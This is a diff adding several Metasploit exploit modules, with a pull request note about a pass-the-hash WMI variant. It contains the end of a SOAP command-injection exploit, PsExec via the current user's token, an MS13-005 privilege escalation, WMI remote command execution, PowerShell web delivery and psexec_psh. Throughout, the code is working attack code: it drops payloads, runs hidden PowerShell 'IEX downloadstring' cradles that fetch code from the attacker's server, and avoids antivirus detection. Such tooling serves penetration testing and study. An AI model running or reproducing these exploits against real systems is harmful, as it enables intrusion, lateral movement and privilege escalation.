+    if version =~ /7\.4\.0/ and version <= "7.4.0.787"
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def send_request_soap(data)
+    res = send_request_cgi({
+      'uri'     => normalize_uri(target_uri.path),
+      'method'  => 'POST',
+      'ctype'   => 'text/xml; charset=utf-8',
+      'headers' =>
+        {
+          'SOAPAction'     => "\"\""
+        },
+      'data'    => data
+    })
+
+    return res
+  end
+
+  def exploit
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    if command.length > 8000
+      # Windows 2008 Command Prompt Max Length is 8191
+      fail_with(Failure::BadConfig, "#{peer} - The selected paylod is too long to execute through powershell in one command")
+    end
+    print_status("#{peer} - Exploiting through Powershell...")
+    execute_command(command)
+  end
+
+  def execute_command(cmd)
+    # HTML encode ampersands so SOAP is correctly interpreted
+    cmd.gsub!(/&/, "&#x26;")
+    injection = "c:\\&#x22;&#x26; #{cmd} &#x26;&#x22;"
+    exploit_data = create_data_store_soap(rand_text_alpha(4), injection)
+    begin
+      res = send_request_soap(exploit_data)
+      if res.nil? or res.code != 500 or ( res.body !~ /Error creating data files at/ and res.body !~ /Data files don't exist/ )
+        print_status("#{res.code}\n#{res.body}") if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to execute the CMD Stager")
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Unable to connect")
+    end
+  end
+
+end

--- a/modules/exploits/windows/local/current_user_psexec.rb
+++ b/modules/exploits/windows/local/current_user_psexec.rb
@@ -1,0 +1,142 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Post::Windows::Services
+  include Exploit::EXE
+  include Exploit::Powershell
+  include Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'PsExec via Current User Token',
+        'Description'   => %q{
+          This module uploads an executable file to the victim system, creates
+          a share containing that executable, creates a remote service on each
+          target system using a UNC path to that file, and finally starts the
+          service(s).
+
+          The result is similar to psexec but with the added benefit of using
+          the session's current authentication token instead of having to know
+          a password or hash.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'egypt',
+            'jabra'  # Brainstorming and help with original technique
+          ],
+        'References'    => [
+            # same as for windows/smb/psexec
+            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+            [ 'OSVDB', '3106'],
+            [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+          ],
+        'DefaultOptions' =>
+            {
+                'WfsDelay'     => 10,
+            },
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Targets' => [ [ 'Universal', {} ] ],
+        'DefaultTarget' => 0
+      ))
+
+    register_options([
+      OptString.new("INTERNAL_ADDRESS", [
+        false,
+        "Session's internal address or hostname for the victims to grab the "+
+        "payload from (Default: detected)"
+        ]),
+      OptString.new("NAME",     [ false, "Service name on each target in RHOSTS (Default: random)" ]),
+      OptString.new("DISPNAME", [ false, "Service display name (Default: random)" ]),
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use", 'SMB', ['PSH', 'SMB'] ]),
+      OptAddressRange.new("RHOSTS", [ false, "Target address range or CIDR identifier" ]),
+    ])
+  end
+
+  def exploit
+    name = datastore["NAME"] || Rex::Text.rand_text_alphanumeric(10)
+    display_name = datastore["DISPNAME"] || Rex::Text.rand_text_alphanumeric(10)
+    if datastore['TECHNIQUE'] == 'SMB'
+      # XXX Find the domain controller
+
+      #share_host = datastore["INTERNAL_ADDRESS"] || detect_address
+      share_host = datastore["INTERNAL_ADDRESS"] || session.session_host
+      print_status "Using #{share_host} as the internal address for victims to get the payload from"
+
+      # Build a random name for the share and directory
+      share_name = Rex::Text.rand_text_alphanumeric(8)
+      drive = session.fs.file.expand_path("%SYSTEMDRIVE%")
+      share_dir = "#{drive}\\#{share_name}"
+
+      # Create them
+      print_status("Creating share #{share_dir}")
+      session.fs.dir.mkdir(share_dir)
+      cmd_exec("net share #{share_name}=#{share_dir}")
+
+      # Generate an executable from the shellcode and drop it in the share
+      # directory
+      filename = "#{Rex::Text.rand_text_alphanumeric(8)}.exe"
+      payload_exe = generate_payload_exe_service(
+        :servicename => name,
+        # XXX Ghetto
+        :arch => payload.send(:pinst).arch.first
+      )
+
+      print_status("Dropping payload #{filename}")
+      write_file("#{share_dir}\\#{filename}", payload_exe)
+
+      service_executable = "\\\\#{share_host}\\#{share_name}\\#{filename}"
+    else
+      service_executable = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    end
+
+    begin
+      Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
+        begin
+          print_status("#{server.ljust(16)} Creating service #{name}")
+
+          # 3 is Manual startup. Should probably have constants for this junk
+          service_create(name, display_name, service_executable, 3, server)
+
+          # If everything went well, this will create a session. If not, it
+          # might be permissions issues or possibly we failed to create the
+          # service.
+          print_status("#{server.ljust(16)} Starting the service")
+          service_start(name, server)
+
+          print_status("#{server.ljust(16)} Deleting the service")
+          service_delete(name, server)
+        rescue Rex::TimeoutError
+          vprint_status("#{server.ljust(16)} Timed out...")
+          next
+        rescue RuntimeError, ::Rex::Post::Meterpreter::RequestError
+          print_error("Exception running payload: #{$!.class} : #{$!}")
+          print_warning("#{server.ljust(16)} WARNING: May have failed to clean up!")
+          print_warning("#{server.ljust(16)} Try a command like: sc \\\\#{server}\\ delete #{name}")
+          next
+        end
+      end
+    ensure
+      if datastore['TECHNIQUE'] == 'SMB'
+        print_status("Deleting share #{share_name}")
+        cmd_exec("net share #{share_name} /delete /y")
+        print_status("Deleting files #{share_dir}")
+        cmd_exec("cmd /c rmdir /q /s #{share_dir}")
+      end
+    end
+
+  end
+
+end
+

--- a/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
+++ b/modules/exploits/windows/local/ms13_005_hwnd_broadcast.rb
@@ -1,0 +1,237 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/exploit/exe'
+require 'msf/core/exploit/powershell'
+require 'msf/core/post/file'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+  include Msf::Post::File
+
+  def initialize(info={})
+    super( update_info( info,
+      'Name'		=> 'MS13-005 HWND_BROADCAST Low to Medium Integrity Privilege Escalation',
+      'Description'	=> %q{
+        Due to a problem with isolating window broadcast messages in the Windows kernel,
+        an attacker can broadcast commands from a lower Integrity Level process to a
+        higher Integrity Level process, thereby effecting a privilege escalation. This
+        issue affects Windows Vista, 7, 8, Server 2008, Server 2008 R2, Server 2012, and
+        RT. Note that spawning a command prompt with the shortcut key combination Win+Shift+#
+        does not work in Vista, so the attacker will have to check if the user is already
+        running a command prompt and set SPAWN_PROMPT false.
+
+        Three exploit techniques are available with this module. The WEB technique will
+        execute a powershell encoded payload from a Web location.  The FILE technique
+        will drop an executable to the file system, set it to medium integrity and execute
+        it. The TYPE technique will attempt to execute a powershell encoded payload directly
+        from the command line, but may take some time to complete.
+      },
+      'License'	=> MSF_LICENSE,
+      'Author'	=>
+        [
+          'Tavis Ormandy', # Discovery
+          'Axel Souchet',  # @0vercl0k POC
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit module
+        ],
+      'Platform'	=> [ 'win' ],
+      'SessionTypes'	=> [ 'meterpreter' ],
+      'Targets'	=>
+      [
+        [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+        [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+      ],
+      'DefaultTarget' => 0,
+      'DefaultOptions' =>
+        {
+          'WfsDelay' => 40,
+        },
+      'DisclosureDate' => "Nov 27 2012",
+      'References' =>
+        [
+          [ 'CVE', '2013-0008' ],
+          [ 'MSB', 'MS13-005' ],
+          [ 'OSVDB', '88966'],
+          [ 'URL', 'http://blog.cmpxchg8b.com/2013/02/a-few-years-ago-while-working-on.html' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptBool.new('SPAWN_PROMPT', [true, 'Attempts to spawn a medium integrity command prompt', true]),
+        OptEnum.new('TECHNIQUE', [true, 'Delivery technique', 'WEB', ['WEB','FILE','TYPE']]),
+        OptString.new('CUSTOM_COMMAND', [false, 'Custom command to type'])
+      ], self.class
+    )
+
+  end
+
+  def low_integrity_level?
+    tmp_dir = expand_path("%USERPROFILE%")
+    cd(tmp_dir)
+    new_dir = "#{rand_text_alpha(5)}"
+    begin
+      session.shell_command_token("mkdir #{new_dir}")
+    rescue
+      return true
+    end
+
+    if directory?(new_dir)
+      session.shell_command_token("rmdir #{new_dir}")
+      return false
+    else
+      return true
+    end
+  end
+
+  def win_shift(number)
+    vk = 0x30 + number
+    bscan = 0x81 + number
+    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 0, 0)
+    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 0, 0)
+    client.railgun.user32.keybd_event(vk, bscan, 0, 0)
+    client.railgun.user32.keybd_event(vk, bscan, 'KEYEVENTF_KEYUP', 0)
+    client.railgun.user32.keybd_event('VK_LWIN', 0x5b, 'KEYEVENTF_KEYUP', 0)
+    client.railgun.user32.keybd_event('VK_LSHIFT', 0xAA, 'KEYEVENTF_KEYUP', 0)
+  end
+
+  def count_cmd_procs
+    count = 0
+    client.sys.process.each_process do |proc|
+      if proc['name'] == 'cmd.exe'
+        count += 1
+      end
+    end
+
+    vprint_status("Cmd prompt count: #{count}")
+    return count
+  end
+
+  def cleanup
+    if datastore['SPAWN_PROMPT'] and @hwin
+      vprint_status("Rehiding window...")
+      client.railgun.user32.ShowWindow(@hwin, 0)
+    end
+    super
+  end
+
+  def exploit
+    # First of all check if the session is running on Low Integrity Level.
+    # If it isn't doesn't worth continue
+    print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+    fail_with(Failure::NotVulnerable, "Not running at Low Integrity!") unless low_integrity_level?
+
+    # If the user prefers to drop payload to FILESYSTEM, try to cd to %TEMP% which
+    # hopefully will be "%TEMP%/Low" (IE Low Integrity Process case) where a low
+    # integrity process can write.
+    drop_to_fs = false
+    if datastore['TECHNIQUE'] == 'FILE'
+      payload_file = "#{rand_text_alpha(5+rand(3))}.exe"
+      begin
+        tmp_dir = expand_path("%TEMP%")
+        tmp_dir << "\\Low" unless tmp_dir[-3,3] =~ /Low/i
+        cd(tmp_dir)
+        print_status("Trying to drop payload to #{tmp_dir}...")
+        if write_file(payload_file, generate_payload_exe)
+          print_good("Payload dropped successfully, exploiting...")
+          drop_to_fs = true
+          register_file_for_cleanup(payload_file)
+          payload_path = tmp_dir
+        else
+          print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
+          drop_to_fs = false
+        end
+      rescue ::Rex::Post::Meterpreter::RequestError
+        print_error("Failed to drop payload to File System, will try to execute the payload from PowerShell, which requires HTTP access.")
+        drop_to_fs = false
+      end
+    end
+
+    if drop_to_fs
+      command = "cd #{payload_path} && icacls #{payload_file} /setintegritylevel medium && #{payload_file}"
+      make_it(command)
+    elsif datastore['TECHNIQUE'] == 'TYPE'
+      if datastore['CUSTOM_COMMAND']
+        command = datastore['CUSTOM_COMMAND']
+      else
+        print_warning("WARNING: It can take a LONG TIME to broadcast the cmd script to execute the powershell command line payload")
+        command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+      end
+      make_it(command)
+    else
+      super
+    end
+  end
+
+  def primer
+    url = get_uri()
+    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+    command = generate_psh_command_line({
+      :noprofile => true,
+      :windowstyle => 'hidden',
+      :command => download_and_run
+    })
+    make_it(command)
+  end
+
+  def make_it(command)
+    if datastore['SPAWN_PROMPT']
+      @hwin = client.railgun.kernel32.GetConsoleWindow()['return']
+      if @hwin == nil
+        @hwin = client.railgun.user32.GetForegroundWindow()['return']
+      end
+      client.railgun.user32.ShowWindow(@hwin, 0)
+      client.railgun.user32.ShowWindow(@hwin, 5)
+
+      # Spawn low integrity cmd.exe
+      print_status("Spawning Low Integrity Cmd Prompt")
+      windir = client.fs.file.expand_path("%windir%")
+      li_cmd_pid = client.sys.process.execute("#{windir}\\system32\\cmd.exe", nil, {'Hidden' => false }).pid
+
+      count = count_cmd_procs
+      spawned = false
+      print_status("Bruteforcing Taskbar Position")
+      9.downto(1) do |number|
+        vprint_status("Attempting Win+Shift+#{number}")
+        win_shift(number)
+        sleep(1)
+
+        if count_cmd_procs > count
+          print_good("Spawned Medium Integrity Cmd Prompt")
+          spawned = true
+          break
+        end
+      end
+
+      client.sys.process.kill(li_cmd_pid)
+
+      fail_with(Failure::Unknown, "No Cmd Prompt spawned") unless spawned
+    end
+
+    print_status("Broadcasting payload command to prompt... I hope the user is asleep!")
+    multi_rail = []
+    command.each_char do |c|
+      multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', c.unpack('c').first, 0]]
+    end
+
+    multi_rail << ['user32', 'SendMessageA', ['HWND_BROADCAST', 'WM_CHAR', 'VK_RETURN', 0]]
+    print_status("Executing command...")
+    client.railgun.multi(multi_rail)
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Delivering Payload")
+    data = Msf::Util::EXE.to_win32pe_psh_net(framework, payload.encoded)
+    send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
+  end
+end
+

--- a/modules/exploits/windows/local/wmi.rb
+++ b/modules/exploits/windows/local/wmi.rb
@@ -1,0 +1,161 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Powershell
+
+  def initialize(info={})
+    super( update_info( info,
+        'Name'          => 'Windows Management Instrumentation (WMI) Remote Command Execution',
+        'Description'   => %q{
+          This module executes powershell on the remote host using the current
+          user credentials or those supplied. Instead of using PSEXEC over TCP
+          port 445 we use the WMIC command to start a Remote Procedure Call on
+          TCP port 135 and an ephemeral port. Set ReverseListenerComm to tunnel
+          traffic through that session.
+
+          The result is similar to psexec but with the added benefit of using
+          the session's current authentication token instead of having to know
+          a password or hash.
+
+          We do not get feedback from the WMIC command so there are no
+          indicators of success or failure. The remote host must be configured
+          to allow remote Windows Management Instrumentation.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        => [
+            'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'
+          ],
+        'References'    =>
+          [
+            [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+            [ 'OSVDB', '3106'],
+            [ 'URL', 'http://passing-the-hash.blogspot.co.uk/2013/07/WMIS-PowerSploit-Shells.html' ],
+          ],
+        'DefaultOptions' =>
+            {
+                'EXITFUNC' => 'thread',
+                'WfsDelay' => '15',
+            },
+        'DisclosureDate' => 'Jan 01 1999',
+        'Platform'      => [ 'win' ],
+        'SessionTypes'  => [ 'meterpreter' ],
+        'Targets'	=>
+        [
+            [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+            [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+        'DefaultTarget' => 0
+      ))
+
+    register_options([
+      OptString.new('SMBUser', [ false, 'The username to authenticate as' ]),
+      OptString.new('SMBPass', [ false, 'The password for the specified username' ]),
+      OptString.new('SMBDomain',  [ false, 'The Windows domain to use for authentication' ]),
+      OptAddressRange.new("RHOSTS", [ true, "Target address range or CIDR identifier" ]),
+      # Move this out of advanced
+      OptString.new('ReverseListenerComm', [ false, 'The specific communication channel to use for this listener'])
+    ])
+  end
+
+  def exploit
+    if datastore['SMBUser'] and datastore['SMBPass'].nil?
+      fail_with(Failure::BadConfig, "Need both username and password set.")
+    end
+
+    Rex::Socket::RangeWalker.new(datastore["RHOSTS"]).each do |server|
+      # TODO: CHECK WMIC Access by reading the clipboard?
+      # TODO: wmic /output:clipboard
+      # TODO: Needs to be meterpreter ext side due to threading
+
+      # Get the PSH Payload and split it into bitesize chunks
+      # 1024 appears to be the max value allowed in env vars
+      psh = cmd_psh_payload(payload.encoded,
+                            payload_instance.arch.first,
+                            {
+                                :remove_comspec => true,
+                                :use_single_quotes => true
+                            })
+      chunks = split_code(psh, 1000)
+
+      begin
+        print_status("[#{server}] Storing payload in environment variables")
+        env_name = rand_text_alpha(rand(3)+3)
+        env_vars = []
+        0.upto(chunks.length-1) do |i|
+          env_vars << "#{env_name}#{i}"
+          c = "cmd /c SETX #{env_vars[i]} \"#{chunks[i]}\" /m"
+          wmic_command(server, c)
+        end
+
+        x = rand_text_alpha(rand(3)+3)
+        exec_cmd = generate_psh_command_line({
+          :noprofile => true,
+          :windowstyle => 'hidden',
+          :command => "$#{x}=''"
+        })
+        env_vars.each do |env|
+          exec_cmd << "+$env:#{env}"
+        end
+        exec_cmd << ";IEX $#{x};"
+
+        print_status("[#{server}] Executing payload")
+        wmic_command(server, exec_cmd)
+
+        print_status("[#{server}] Cleaning up environment variables")
+        env_vars.each do |env|
+          cleanup_cmd = "cmd /c REG delete \"HKLM\\\SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment\" /V #{env} /f"
+          wmic_command(server, cleanup_cmd)
+        end
+      rescue Rex::Post::Meterpreter::RequestError => e
+        print_error("[#{server}] Error moving on... #{e}")
+        next
+      ensure
+        select(nil,nil,nil,2)
+      end
+    end
+  end
+
+  def wmic_user_pass_string(domain=datastore['SMBDomain'], user=datastore['SMBUser'], pass=datastore['SMBPass'])
+    userpass = ""
+
+    unless user.nil?
+      if domain.nil?
+        userpass = "/user:\"#{user}\" /password:\"#{pass}\" "
+      else
+        userpass = "/user:\"#{domain}\\#{user}\" /password:\"#{pass}\" "
+      end
+    end
+
+    return userpass
+  end
+
+  def wmic_command(server, cmd)
+    wcmd = "wmic #{wmic_user_pass_string}/node:#{server} process call create \"#{cmd.gsub('"','\\"')}\""
+    vprint_status("[#{server}] #{wcmd}")
+
+    # We dont use cmd_exec as WMIC cannot be Channelized
+    ps = session.sys.process.execute(wcmd, "", {'Hidden' => true, 'Channelized' => false})
+    select(nil,nil,nil,0.1)
+  end
+
+  def split_code(psh, chunk_size)
+    array = []
+    idx = 0
+    while (idx < psh.length)
+      array << psh[idx, chunk_size]
+      idx += chunk_size
+    end
+    return array
+  end
+
+end
+

--- a/modules/exploits/windows/misc/psh_web_delivery.rb
+++ b/modules/exploits/windows/misc/psh_web_delivery.rb
@@ -1,0 +1,76 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'		 => 'PowerShell Payload Web Delivery',
+      'Description'	 => %q{
+        This module quickly fires up a web server that serves the payload in PowerShell.
+        The provided command will start PowerShell and then download and execute the
+        payload. The IEX command can also be extracted to execute directly from PowerShell.
+        The main purpose of this module is to quickly establish a session on a target
+        machine when the attacker has to manually type in the command himself, e.g. RDP
+        Session, Local Access or maybe Remote Command Exec. This attack vector does not
+        write to disk so is less likely to trigger AV solutions and will allow privilege
+        escalations supplied by Meterpreter. Ensure the payload architecture matches the
+        target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.
+      },
+      'License'	 => MSF_LICENSE,
+      'Author'	 =>
+        [
+          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>',
+          'Chris Campbell' #@obscuresec - Inspiration n.b. no relation!
+        ],
+      'References'	 =>
+        [
+          [ 'URL', 'http://www.pentestgeek.com/2013/07/19/invoke-shellcode/' ],
+          [ 'URL', 'http://www.powershellmagazine.com/2013/04/19/pstip-powershell-command-line-switches-shortcuts/'],
+          [ 'URL', 'http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html']
+        ],
+      'Platform'	 => 'win',
+      'Targets'	 =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jul 19 2013'))
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Delivering Payload")
+    data = Msf::Util::EXE.to_win32pe_psh_net(framework,
+                                             payload.encoded,
+                                             )
+    psh = cmd_psh_payload(payload.encoded,
+                          payload_instance.arch.first,
+                          {
+                              :remove_comspec => true,
+                              :use_single_quotes => true
+                          })
+    send_response(cli, psh, { 'Content-Type' => 'application/octet-stream' })
+  end
+
+  def primer
+    url = get_uri()
+    download_and_run = "IEX ((new-object net.webclient).downloadstring('#{url}'))"
+    print_status("Run the following command on the target machine:")
+    print_line generate_psh_command_line({
+                                     :noprofile => true,
+                                     :windowstyle => 'hidden',
+                                     :command => download_and_run
+                                 })
+  end
+end
+

--- a/modules/exploits/windows/smb/psexec_psh.rb
+++ b/modules/exploits/windows/smb/psexec_psh.rb
@@ -1,0 +1,102 @@
+# -*- coding: binary -*-
+
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'msf/core/exploit/powershell'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  # Exploit mixins should be called first
+  include Msf::Exploit::Remote::SMB::Psexec
+  include Msf::Exploit::Powershell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft Windows Authenticated Powershell Command Execution',
+      'Description'    => %q{
+          This module uses a valid administrator username and password to execute a powershell
+        payload using a similar technique to the "psexec" utility provided by SysInternals. The
+        payload is encoded in base64 and executed from the commandline using the -encodedcommand
+        flag. Using this method, the payload is never written to disk, and given that each payload
+        is unique, is less prone to signature based detection. Since executing shellcode in .NET
+        requires the use of system resources from unmanaged memory space, the .NET (PSH) architecture
+        must match that of the payload. Lastly, a persist option is provided to execute the payload
+        in a while loop in order to maintain a form of persistence. In the event of a sandbox
+        observing PSH execution, a delay and other obfuscation may be added to avoid detection.
+        In order to avoid interactive process notifications for the current user, the psh payload has
+        been reduced in size and wrapped in a powershell invocation which hides the window entirely.
+      },
+
+      'Author'         => [
+        'Royce @R3dy__ Davis <rdavis[at]accuvant.com>', # PSExec command module
+        'RageLtMan <rageltman[at]sempervictus' # PSH exploit, libs, encoders
+      ],
+      'License'        => MSF_LICENSE,
+      'Privileged'     => true,
+      'DefaultOptions' =>
+        {
+          'WfsDelay'     => 10,
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 1999',
+      'References'     => [
+        [ 'CVE', '1999-0504'], # Administrator with no password (since this is the default)
+        [ 'OSVDB', '3106'],
+        [ 'URL', 'http://www.accuvant.com/blog/2012/11/13/owning-computers-without-shell-access' ],
+        [ 'URL', 'http://sourceforge.net/projects/smbexec/' ],
+        [ 'URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx' ]
+      ]
+    ))
+
+    register_options([
+      OptBool.new('DryRun',[false,'Prints the powershell command that would be used',false]),
+    ], self.class)
+  end
+
+  def exploit
+    command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)
+    if datastore['DryRun']
+      print_good command.inspect
+      return
+    end
+
+    if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']
+      print_warning("You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option")
+    end
+
+    # Try and authenticate with given credentials
+    if connect
+      begin
+        smb_login
+      rescue StandardError => autherror
+        fail_with(Exploit::Failure::NoAccess, "#{peer} - Unable to authenticate with given credentials: #{autherror}")
+      end
+      # Execute the powershell command
+      print_status("#{peer} - Executing the payload...")
+      begin
+        return psexec(command)
+      rescue StandardError => exec_command_error
+        fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to execute specified command: #{exec_command_error}")
+      ensure
+        disconnect
+      end
+    end
+  end
+
+  def peer
+    return "#{rhost}:#{rport}"
+  end
+end
+


### PR DESCRIPTION
This uses PTH-WMIS to fire over a powershell payload. Unfortunatly as DCERPC and NTLMSSP is a bit of a mission to implement currently I have cheated and just used a system call to pth-wmis. So it is unlikely to ever be accepted into main repo :)

`local_command = "pth-wmis -U #{domain}#{user}%#{pass} //#{datastore['RHOST']} \"#{command}\""`

I have basically cherry-picked files from https://github.com/rapid7/metasploit-framework/pull/2557 which updates the Powershell exploitation techniques and related exploits. Its taking an age to be verified :(

I haven't kept all the history as I'm gitilliterate but most of the powershell stuff is based on @sempervictus's work
